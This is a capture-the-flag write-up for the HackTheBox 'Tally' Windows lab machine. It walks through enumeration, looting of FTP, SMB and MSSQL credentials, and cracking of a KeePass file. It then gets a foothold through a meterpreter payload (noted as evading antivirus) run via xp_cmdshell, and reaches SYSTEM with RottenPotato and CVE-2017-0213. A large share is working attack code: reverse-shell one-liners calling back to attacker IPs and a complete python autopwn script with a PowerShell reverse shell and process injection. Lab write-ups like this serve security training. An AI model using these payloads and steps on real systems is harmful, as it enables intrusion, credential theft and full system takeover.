Tally write-up

Ανάλυση του Tally

· Cybersecurity Κυβερνοασφάλεια · hackthebox hackthebox windows windows

Enumeration

Port scanning

Let’s scan the full range of TCP ports using my tool htbscan.py (you can find it here: https://github.com/Alamot/code-snippets/blob/master/enum/htbscan.py): 

$ sudo ./htbscan.py 10.10.10.59 300

Running command: sudo masscan -e tun0 -p0-65535 --max-rate 300 --interactive 10.10.10.59

Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2018-05-03 12:04:44 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65536 ports/host]
Discovered open port 49668/tcp on 10.10.10.59                                  
Discovered open port 80/tcp on 10.10.10.59                                     
Discovered open port 445/tcp on 10.10.10.59                                    
Discovered open port 32843/tcp on 10.10.10.59                                  
Discovered open port 49665/tcp on 10.10.10.59                                  
Discovered open port 1433/tcp on 10.10.10.59                                   
Discovered open port 135/tcp on 10.10.10.59                                    
Discovered open port 32844/tcp on 10.10.10.59                                  
Discovered open port 81/tcp on 10.10.10.59                                     
Discovered open port 49667/tcp on 10.10.10.59                                  
Discovered open port 32846/tcp on 10.10.10.59                                  
Discovered open port 49666/tcp on 10.10.10.59                                  
Discovered open port 49666/tcp on 10.10.10.59                                  
Discovered open port 47001/tcp on 10.10.10.59                                  
Discovered open port 15567/tcp on 10.10.10.59                                  
Discovered open port 49664/tcp on 10.10.10.59                                  
Discovered open port 139/tcp on 10.10.10.59                                    
Discovered open port 49670/tcp on 10.10.10.59                                  
                                                                             
Running command: sudo nmap -A -p80,81,135,139,445,1433,15567,32843,32844,32846,47001,49664,49665,49666,49667,49668,49670 10.10.10.59

Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-03 15:11 EEST
Nmap scan report for 10.10.10.59
Host is up (0.12s latency).

PORT      STATE SERVICE              VERSION
80/tcp    open  http                 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
81/tcp    open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
135/tcp   open  msrpc                Microsoft Windows RPC
139/tcp   open  netbios-ssn          Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds         Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp  open  ms-sql-s             Microsoft SQL Server 2016 13.00.1601.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: TALLY
|   NetBIOS_Domain_Name: TALLY
|   NetBIOS_Computer_Name: TALLY
|   DNS_Domain_Name: TALLY
|   DNS_Computer_Name: TALLY
|_  Product_Version: 10.0.14393
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2018-05-03T10:47:41
|_Not valid after:  2048-05-03T10:47:41
|_ssl-date: 2018-05-03T12:12:35+00:00; +3s from scanner time.
15567/tcp open  http                 Microsoft IIS httpd 10.0
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|   Negotiate
|_  NTLM
| http-ntlm-info: 
|   Target_Name: TALLY
|   NetBIOS_Domain_Name: TALLY
|   NetBIOS_Computer_Name: TALLY
|   DNS_Domain_Name: TALLY
|   DNS_Computer_Name: TALLY
|_  Product_Version: 10.0.14393
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title.
32843/tcp open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
32844/tcp open  ssl/http             Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
| ssl-cert: Subject: commonName=SharePoint Services/organizationName=Microsoft/countryName=US
| Subject Alternative Name: DNS:localhost, DNS:tally
| Not valid before: 2017-09-17T22:51:16
|_Not valid after:  9999-01-01T00:00:00
|_ssl-date: 2018-05-03T12:12:37+00:00; +3s from scanner time.
| tls-alpn: 
|   h2
|_  http/1.1
32846/tcp open  msexchange-logcopier Microsoft Exchange 2010 log copier
47001/tcp open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc                Microsoft Windows RPC
49665/tcp open  msrpc                Microsoft Windows RPC
49666/tcp open  msrpc                Microsoft Windows RPC
49667/tcp open  msrpc                Microsoft Windows RPC
49668/tcp open  msrpc                Microsoft Windows RPC
49670/tcp open  msrpc                Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2016 build 10586 - 14393 (96%), Microsoft Windows Server 2016 (95%), Microsoft Windows 10 1507 (93%), Microsoft Windows 10 1507 - 1607 (93%), Microsoft Windows 10 1511 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Server 2012 R2 (93%), Microsoft Windows Server 2012 R2 Update 1 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%), Microsoft Windows Vista SP1 - SP2, Windows Server 2008 SP2, or Windows 7 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2s, deviation: 0s, median: 2s
| ms-sql-info: 
|   10.10.10.59:1433: 
|     Version: 
|       name: Microsoft SQL Server 2016 RTM
|       number: 13.00.1601.00
|       Product: Microsoft SQL Server 2016
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2018-05-03 15:12:36
|_  start_date: 2018-05-03 13:47:08

Brute forcing Microsoft SharePoint

We see that Microsoft SharePoint is on the box. Let’s download the SharePointURLBrute tool from here: https://www.bishopfox.com/resources/tools/sharepoint-hacking-diggity/attack-tools/

$ perl SharePointURLBrute\ v1.1.pl  -a http://10.10.10.59 -e SharePoint-UrlExtensions-18Mar2012.txt

Starting search for common SharePoint Pages
Start Time: Sun Nov  5 11:37:15 2017

FOUND: http://10.10.10.59/_catalogs/masterpage/Forms/AllItems.aspx
FOUND: http://10.10.10.59/_catalogs/wp/Forms/AllItems.aspx
FOUND: http://10.10.10.59/_layouts/AreaNavigationSettings.aspx
FOUND: http://10.10.10.59/_Layouts/AreaTemplateSettings.aspx
FOUND: http://10.10.10.59/_Layouts/AreaWelcomePage.aspx
FOUND: http://10.10.10.59/_Layouts/ChangeSiteMasterPage.aspx
FOUND: http://10.10.10.59/_layouts/MyInfo.aspx
FOUND: http://10.10.10.59/_layouts/MyPage.aspx
FOUND: http://10.10.10.59/_layouts/PageSettings.aspx
FOUND: http://10.10.10.59/_layouts/policy.aspx
FOUND: http://10.10.10.59/_layouts/policyconfig.aspx
FOUND: http://10.10.10.59/_layouts/policycts.aspx
FOUND: http://10.10.10.59/_layouts/Policylist.aspx
FOUND: http://10.10.10.59/_Layouts/RedirectPage.aspx?Target={SiteCollectionUrl}_catalogs/masterpage
FOUND: http://10.10.10.59/_layouts/SiteDirectorySettings.aspx
FOUND: http://10.10.10.59/_layouts/sitemanager.aspx
FOUND: http://10.10.10.59/_Layouts/SiteManager.aspx?lro=all
FOUND: http://10.10.10.59/_vti_bin/alerts.asmx
FOUND: http://10.10.10.59/_vti_bin/dspsts.asmx
FOUND: http://10.10.10.59/_vti_bin/forms.asmx
FOUND: http://10.10.10.59/_vti_bin/Lists.asmx
FOUND: http://10.10.10.59/_vti_bin/people.asmx
FOUND: http://10.10.10.59/_vti_bin/Permissions.asmx
FOUND: http://10.10.10.59/_vti_bin/search.asmx
FOUND: http://10.10.10.59/_vti_bin/UserGroup.asmx
FOUND: http://10.10.10.59/_vti_bin/versions.asmx
FOUND: http://10.10.10.59/_vti_bin/Views.asmx
FOUND: http://10.10.10.59/_vti_bin/webpartpages.asmx
FOUND: http://10.10.10.59/_vti_bin/webs.asmx
FOUND: http://10.10.10.59/_vti_bin/SharepointEmailWS.asmx
FOUND: http://10.10.10.59/_vti_bin/spsearch.asmx
FOUND: http://10.10.10.59/_vti_bin/WebPartPages.asmx
FOUND: http://10.10.10.59/default.aspx
FOUND: http://10.10.10.59/shared documents/forms/allitems.aspx

Getting FTP credentials

If we open the http://10.10.10.59/shared%20documents/forms/allitems.aspx, we see a file named “ftp-details” modified by tally\administrator. Let’s download it and see what there is inside: 

FTP details
hostname: tally
workgroup: htb.local
password: UTDRSCH53c"$6hys
Please create your own user folder upon logging in

Now, we know the FTP password but we lack the username. If we set a cookie named “mobile” equal to 1 (i.e. mobile=1) and reload the site, a gear appears at the top-right corner. We can click on that gear and select “Site Contents” and then “Site Pages”. There, we find an interesting link named “FinanceTeam.aspx” (again by tally\administrator). I originally found the gear by emulating a mobile device via my browser (using developer tools, google it if you don’t know what I am talking about). When I reloaded the site, the gear appeared at the top-right corner.

Let’s visit that link:

http://10.10.10.59/_layouts/15/mobile/mblwikia.aspx?Url=%2FSitePages%2FFinanceTeam%2Easpx&Source=%2F_layouts%2F15%2Fmobile%2Fviewa%2Easpx%3FList%3D076fa50e%252Dcea0%252D431a%252Dad18%252Dd528cf893d4c%26View%3Dee7b270d%252D91a9%252D482d%252Db7f2%252Df905c4b15281 

Migration update

Hi all,

Welcome to your new team page!

As always, there's still a few finishing touches to make.  Rahul - please upload the design mock ups to the Intranet folder as 'index.html' using the ftp_user account - I aim to review regularly.

We'll also add the fund and client account pages in due course.

Thanks – Sarah & Tim.

Therefore our FTP credentials are ftp_user:UTDRSCH53c”$6hys

Getting SMB credentials

Connect using FTP and have a look in /User/Tim/log/do to.txt 

To do:
Remove migration folder
Set secure share permissions
encrypted share creds:
password in keepass

Let’s download /User/Tim/Files/tim.kdbx and crack it: 

keepass2john tim.kdbx > hash
john --format=KeePass --wordlist=/usr/share/dict/rockyou.txt hash
tim:simplementeyo

Now open tim.kbdx using keepass (Master password: simplementeyo) 

$ keepass tim.kbdx

Go to Database -> WORK -> WINDOWS -> Shares. Here, we found some SMB credentials Finance:Acc0unting (right click and copy password to get the password)

Getting MSSQL credentials

Let’s connect to SMB: 

$ smbclient -U Finance \\\\10.10.10.59\\ACCT
or 
$ sudo mount -t cifs //10.10.10.59/ACCT /mnt/TEMP -o,user=Finance,password=Acc0unting,vers=2.0

Inside the smb:\zz_Migration\Binaries\new Folder\tester.exe we find this: 

DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G;

This means our MSSQL credentials are sa:GWE3V65#6KFH93@4GWTG2G

Getting shell

Let’s make a meterpreter payload using msfvenom. If we use the psh-reflection format our payload invade the antivirus detection: 

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.105 LPORT=60000 -f psh-reflection -o msf.ps1

Don’t forget to set up your listener using exploit/multi/handler: 

msf> use exploit/multi/handler
msf exploit(handler) > options

Module options (exploit/multi/handler):

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.105     yes       The listen address
   LPORT     60000            yes       The listen port

msf exploit(handler) > exploit
[*] Started reverse TCP handler on 127.0.0.1:6000

Now, upload msf.ps1 to /Intranet via FTP. We can execute our payload via MSSQL: 

$ msfconsole
msf> use  auxiliary/admin/mssql/mssql_exec
msf auxiliary(mssql_exec) > set CMD "powershell -ExecutionPolicy bypass -NoExit -File C:\\FTP\\Intranet\\msf.ps1"
msf auxiliary(mssql_exec) > info

Basic options:
  Name             Current Setting
  ----             ---------------
  CMD              powershell -ExecutionPolicy bypass -NoExit -File C:\FTP\Intranet\msf.ps1
  PASSWORD         GWE3V65#6KFH93@4GWTG2G
  RHOST            10.10.10.59
  RPORT            1433
  TDSENCRYPTION    false
  USERNAME         sa
  USE_WINDOWS_AUTH false

msf auxiliary(mssql_exec) > exploit

And here is our meterpreter shell: 

meterpreter > sysinfo
Computer        : TALLY
OS              : Windows 2016 (Build 14393).
Architecture    : x64
System Language : en_GB
Domain          : HTB.LOCAL
Logged On Users : 7
Meterpreter     : x64/windows

Privilege Escalation

Using Incognito and RottenPotato

meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
  SeAssignPrimaryTokenPrivilege
  SeChangeNotifyPrivilege
  SeCreateGlobalPrivilege
  SeImpersonatePrivilege
  SeIncreaseQuotaPrivilege
  SeIncreaseWorkingSetPrivilege


meterpreter > cd C:\\Users\\Sarah\\Desktop
meterpreter > upload rottenpotato.exe
[*] uploading  : rottenpotato.exe -> rottenpotato.exe
[*] uploaded   : rottenpotato.exe -> rottenpotato.exe


meterpreter > load incognito
Loading extension incognito...success.


meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
TALLY\Sarah

Impersonation Tokens Available
========================================
NT SERVICE\SQLSERVERAGENT


meterpreter > execute -Hc -f C:\\Users\\Sarah\\Desktoprottenpotato.exe
Process 7996 created.
Channel 2 created.


meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
TALLY\Sarah

Impersonation Tokens Available
========================================
NT AUTHORITY\SYSTEM
NT SERVICE\SQLSERVERAGENT


meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[-] No delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM


meterpreter > shell
Process 3452 created.
Channel 3 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\Sarah\Desktop> whoami
nt authority\system :D

Using CVE-2017-213

We can also use CVE-2017-213 for privilege escalation:

  1. https://github.com/WindowsExploits/Exploits/blob/master/CVE-2017-0213/Source/CVE-2017-0213.cpp

  2. Change the cmdline in CVE-2017-0213.cpp to run ncat or a powershell script to get a remote shell. E.g.: 

    WCHAR cmdline[] = "C:\\Users\\Sarah\\Desktop\\ncat.exe 10.10.14.190 60002 -e cmd.exe"
    or 
    WCHAR cmdline[] = L"powershell -ExecutionPolicy bypass -NoExit -File C:\\FTP\\Intranet\\shell.ps1";

  3. Compile it, upload it and copy it in a folder where user has write permissions.

  4. Migrate your existing shell to another process (Important! Otherwise it doesn’t work.)

  5. Set up the listener on your side.

  6. Execute CVE-2017-213.exe

You can download my autopwn script (and the other required files) from here: https://github.com/Alamot/code-snippets/tree/master/hacking/HTB/Tally

(Don’t forget to set LHOST appropriately. If you are using a Linux OS, the script tries to automatically get the LHOST IP from the tun0 interface). 

#!/usr/bin/env python2
# Author: Alamot
import sys
import uuid
import fcntl
import _mssql
import signal
import ftplib
from pwn import *
from subprocess import call
from base64 import b64encode
signal.signal(signal.SIGINT, signal.SIG_DFL)


def get_ip_address(ifname):
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    return socket.inet_ntoa(fcntl.ioctl(
        s.fileno(),
        0x8915,  # SIOCGIFADDR
        struct.pack('256s', ifname[:15].encode())
    )[20:24])


#LHOST = "10.10.15.247"
LHOST = get_ip_address('tun0')
LPORT1="60000"
LPORT2="60001"
LPORT3="60002"
FTP_SERVER = "10.10.10.59"
FTP_USERNAME = "ftp_user"
FTP_PASSWORD = "UTDRSCH53c\"$6hys"
FTP_UPLOADPATH = "Intranet"
MSSQL_SERVER = "10.10.10.59:1433"
MSSQL_USERNAME = "sa"
MSSQL_PASSWORD = "GWE3V65#6KFH93@4GWTG2G"
TIMEOUT = 60


def get_ps_payload(lost, lport):
    return "$client = New-Object System.Net.Sockets.TCPClient('"+lost+"',"+lport+"); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close();"

payload1 = get_ps_payload(LHOST, LPORT1)
payload2 = get_ps_payload(LHOST, LPORT2)
payload3 = get_ps_payload(LHOST, LPORT3)

def initiate():
    unique_filename1 = "msf1.ps1"
    unique_filename2 = "msf2.ps1"
    with open(unique_filename1,'wt') as f:
        f.write(payload1)
    with open(unique_filename2,'wt') as f:
        f.write(payload3)
        
    ftp = None
    try:
        ftp = ftplib.FTP(FTP_SERVER,FTP_USERNAME,FTP_PASSWORD)
        log.success("Successful login at ftp server "+FTP_SERVER+" with username '"+FTP_USERNAME+"' and password '"+FTP_PASSWORD+"'")
        log.info("Changing current working directory to " + FTP_UPLOADPATH)
        ftp.cwd('/'+FTP_UPLOADPATH)
        
        log.info("Uploading "+unique_filename1)
        with open(unique_filename1,'rb') as f:         
            ftp.storbinary('STOR '+unique_filename1, f)

        log.info("Uploading Invoke-PSInject.ps1")
        with open("Invoke-PSInject.ps1",'rb') as f:         
            ftp.storbinary("STOR Invoke-PSInject.ps1", f)
            
        log.info("Uploading "+unique_filename2)
        with open(unique_filename2,'rb') as f:         
            ftp.storbinary('STOR '+unique_filename2, f)
            
        log.info("Uploading cve2017213ps.exe")
        with open("cve2017213ps.exe",'rb') as f:         
            ftp.storbinary("STOR cve2017213ps.exe", f)

            
    except Exception as e:
        log.failure("FTP failed: "+str(e))
    finally:
        if ftp:
            ftp.quit()


    mssql = None
    try:
        mssql = _mssql.connect(server=MSSQL_SERVER, user=MSSQL_USERNAME, password=MSSQL_PASSWORD)
        log.success("Successful login at mssql server "+MSSQL_SERVER+" with username '"+MSSQL_USERNAME+"' and password '"+MSSQL_PASSWORD+"'")
        log.info("Enabling 'xp_cmdshell'")
        mssql.execute_query("EXEC sp_configure 'show advanced options', 1;RECONFIGURE;exec SP_CONFIGURE 'xp_cmdshell', 1;RECONFIGURE -- ")
        mssql.execute_query("EXEC master..xp_cmdshell 'powershell -ExecutionPolicy bypass -NoExit -File C:\\FTP\\"+FTP_UPLOADPATH+"\\"+unique_filename1+"'")
    except Exception as e:
        log.failure("MSSQL failed: "+str(e))
    finally:
        if mssql:
            mssql.close()


log.info("LHOST = "+LHOST)

try:
    threading.Thread(target=initiate).start()
except Exception as e:
    log.error(str(e))
    
ps1 = listen(LPORT1, timeout=TIMEOUT).wait_for_connection()
if ps1.sock is None:
    log.failure("Connection timeout.")
    sys.exit()
ps1.sendline("cd C:\\FTP\\"+FTP_UPLOADPATH+"\\")
ps1.sendline(". .\\Invoke-PSInject.ps1")
ps1.sendline("Invoke-PSInject -ProcName sihost -PoshCode "+b64encode(payload2.encode('UTF-16LE')))

ps2 = listen(LPORT2, timeout=TIMEOUT).wait_for_connection()
if ps2.sock is None:
    log.failure("Connection timeout.")
    sys.exit()
ps2.sendline("copy C:\\FTP\\"+FTP_UPLOADPATH+"\\cve2017213ps.exe C:\\TEMP\\cve2017213ps.exe")
ps2.sendline("cd C:\\TEMP\\")
ps2.sendline(". .\\cve2017213ps.exe")

ps3 = listen(LPORT3, timeout=TIMEOUT).wait_for_connection()
if ps3.sock is None:
    log.failure("Connection timeout.")
    sys.exit()
ps3.interactive()

sys.exit()

Here is the output: 

[*] LHOST = 10.10.15.247
[+] Trying to bind to 0.0.0.0 on port 60000: Done
[+] Waiting for connections on 0.0.0.0:60000: Got connection from 10.10.10.59 on port 50143
[+] Successful login at ftp server 10.10.10.59 with username 'ftp_user' and password 'UTDRSCH53c"$6hys'
[*] Changing current working directory to Intranet
[*] Uploading msf1.ps1
[*] Uploading Invoke-PSInject.ps1
[*] Uploading msf2.ps1
[*] Uploading cve2017213ps.exe
[+] Successful login at mssql server 10.10.10.59:1433 with username 'sa' and password 'GWE3V65#6KFH93@4GWTG2G'
[*] Enabling 'xp_cmdshell'
[+] Trying to bind to 0.0.0.0 on port 60001: Done
[+] Waiting for connections on 0.0.0.0:60001: Got connection from 10.10.10.59 on port 50154
[+] Trying to bind to 0.0.0.0 on port 60002: Done
[+] Waiting for connections on 0.0.0.0:60002: Got connection from 10.10.10.59 on port 50161
[*] Switching to interactive mode
$ whoami
nt authority\system
PS C:\Windows\system32$

What about exploiting Firefox

On the box, there is Firefox version 44.0.2 and a script automatically opens C:\FTP\Intranet\index.html every now and then: 

C:\Users\Sarah\Desktop> type browser.bat
...
REM copy latest mockups to webroot
copy /Y C:\FTP\Intranet\index.html C:\inetpub\wwwroot\HRTJYKYRBSHYJ\index.html

REM browse file
start "" "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe" "http://127.0.0.1:81/HRTJYKYRBSHYJ/index.html"
...

In theory, we could exploit it by uploading an evil index.html via the FTP. 

$ searchsploit firefox 44.0.2 -w

Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution https://www.exploit-db.com/exploits/44294/

Unfortunately, I was not able to make it work. I even enabled RDP on the box and I connected to check what is going on. The exploit is opened normally but the firefox either crashes or it doesn’t execute the payload properly.

See also...

Δείτε επίσης...